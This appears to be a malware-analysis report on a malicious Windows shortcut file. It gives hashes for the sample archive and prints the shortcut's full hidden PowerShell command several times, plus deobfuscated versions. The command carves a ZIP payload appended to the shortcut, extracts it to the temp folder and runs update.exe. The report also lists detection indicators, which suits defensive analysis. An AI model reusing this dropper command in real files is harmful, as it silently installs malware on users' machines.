bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip
ZIP Archive | MD5: ef4bb8f41f4262193eb2b599c573ba40 | Size: 207.89 KB | application/zip
| Hash | Hash Value |
|---|---|
| MD5 | ef4bb8f41f4262193eb2b599c573ba40 |
| SHA-1 | baa0b861db90f186fdc481facdb2bdfc74b4f70a |
| SHA-256 | 4d9d5dddb6c278fc4c4c24d73a01500194992b1d0254e9faec9ff4fa22cbe94f |
| SHA-384 | 8a7b94ebfbf555a7c33db6479dcc04c8507939edfb71c8b984d7baad8d66a981a53ec98f880bb979054c37b45ddd2b2d |
| SHA-512 | 66e04a675d3efeb44d5dbb550a229e981dd4605de87eb50e38d4a0e31ae8189e5cddbd07cb44f58b942e8a3390fc20414a40407d05c2cb76af77141b3c4bec1b |
| ssdeep | 3072:xtYbURcUZ022l6z/MUfS3jGja6gqAPyOLRQX91pSmKMb+UBbDnExFG:x+URcE5fpjx5K9LG9/SHhCbDnExY |
| TLSH | 8B14131A2485BE53DFE488F46D944A04CD8F2EA4FEB700D419AB7BB7F0CA457BD058A4 |

Note: these hashes identify the outer password-protected container archive (`…_password_infected.zip`, 207.89 KB), not the malicious shortcut. Per the Location column further down, the container holds `bb952709…174c6d.bin`, which in turn holds the shortcut `37d7f927…7c4e16.lnk`; the container's hashes are therefore not usable as indicators for the shortcut or its dropped payload.
| Name0 | Value |
|---|---|
| LNK: Command Execution | `cmd.exe /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^\| where-object {$_.length -eq 00209578} ^\| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^\| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^\| Out-Null;^& .\update.exe` |
| Deobfuscated PowerShell | `$obf_lnkpath = Get-ChildItem "*.lnk" \| Where-Object $_."length" -eq 209578 \| Select-Object -ExpandProperty "FullName"; $obf_file = [File]::"ReadAllBytes"($obf_lnkpath); $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip"; $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path); $obf_dir = [Path]::"GetDirectoryName"($obf_path); [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]); Set-Location $obf_dir; Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force \| Out-Null; Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force \| Out-Null; & .\update.exe` |
| Deobfuscated PowerShell | `$obf_lnkpath = Get-ChildItem "*.lnk" \| Where-Object $_."length" -eq 209578 \| Select-Object -ExpandProperty "FullName"; $obf_file = [File]::"ReadAllBytes"($obf_lnkpath); $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip"; $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path); $obf_dir = [Path]::"GetDirectoryName"($obf_path); [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]); Set-Location $obf_dir; Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force \| Out-Null; Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force \| Out-Null; & .\update.exe` — LNK metadata: iconlocation `%WINDIR%\System32\UserAccountControlSettings.exe`; extradata: EnvironmentVariableDataBlock (headerblocksize 788 788, blocksignature -1610612735 = 0xA0000001), targetansi `%windir%\system32\cmd.exe`, targetunicode `%windir%\system32\cmd.exe` |

What the command does: the shortcut's target is `cmd.exe`, which launches a hidden PowerShell (`-windowstyle hidden`). The script locates the shortcut file itself on disk by matching its exact size (209578 bytes) among `*.lnk` in the working directory (normally the folder the shortcut was opened from; not shown in this listing), reads it, and writes everything from byte offset 3412 onward to `%TEMP%\tmp<random>.zip` — i.e. a ZIP archive is appended to the shortcut after its LNK structure. It then changes into `%TEMP%`, extracts the archive there, deletes the ZIP, and runs the dropped `update.exe`. The carets in the command line (`^|`, `^&`) are cmd.exe escape characters that cmd.exe strips before PowerShell sees the pipes and the call operator (the deobfuscated rows originally rendered them as stray `"^"` tokens); `-EA SilentlyContinue` on the extract/delete steps suppresses errors. The icon is borrowed from `UserAccountControlSettings.exe`, presumably to give the shortcut a system-looking appearance. Observable points this artifact supports for detection: `cmd.exe` spawning `powershell.exe -windowstyle hidden` from a `.lnk`, `Get-ChildItem *.lnk` with a `length -eq` filter, `Expand-Archive` into `%TEMP%`, and a process named `update.exe` started from `%TEMP%`.
| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | `cmd.exe /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^\| where-object {$_.length -eq 00209578} ^\| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^\| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^\| Out-Null;^& .\update.exe` Malicious | bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk |
| Deobfuscated PowerShell | `$obf_lnkpath = Get-ChildItem "*.lnk" \| Where-Object $_."length" -eq 209578 \| Select-Object -ExpandProperty "FullName"; $obf_file = [File]::"ReadAllBytes"($obf_lnkpath); $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip"; $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path); $obf_dir = [Path]::"GetDirectoryName"($obf_path); [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]); Set-Location $obf_dir; Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force \| Out-Null; Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force \| Out-Null; & .\update.exe` Malicious | bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk > LNK CommandLine > [PowerShell Command] |
| Deobfuscated PowerShell | `$obf_lnkpath = Get-ChildItem "*.lnk" \| Where-Object $_."length" -eq 209578 \| Select-Object -ExpandProperty "FullName"; $obf_file = [File]::"ReadAllBytes"($obf_lnkpath); $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip"; $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path); $obf_dir = [Path]::"GetDirectoryName"($obf_path); [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]); Set-Location $obf_dir; Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force \| Out-Null; Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force \| Out-Null; & .\update.exe` — LNK metadata: iconlocation `%WINDIR%\System32\UserAccountControlSettings.exe`; extradata: EnvironmentVariableDataBlock (headerblocksize 788 788, blocksignature -1610612735 = 0xA0000001), targetansi `%windir%\system32\cmd.exe`, targetunicode `%windir%\system32\cmd.exe` Malicious | bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk > [Lnk Summary] > [PowerShell Command] |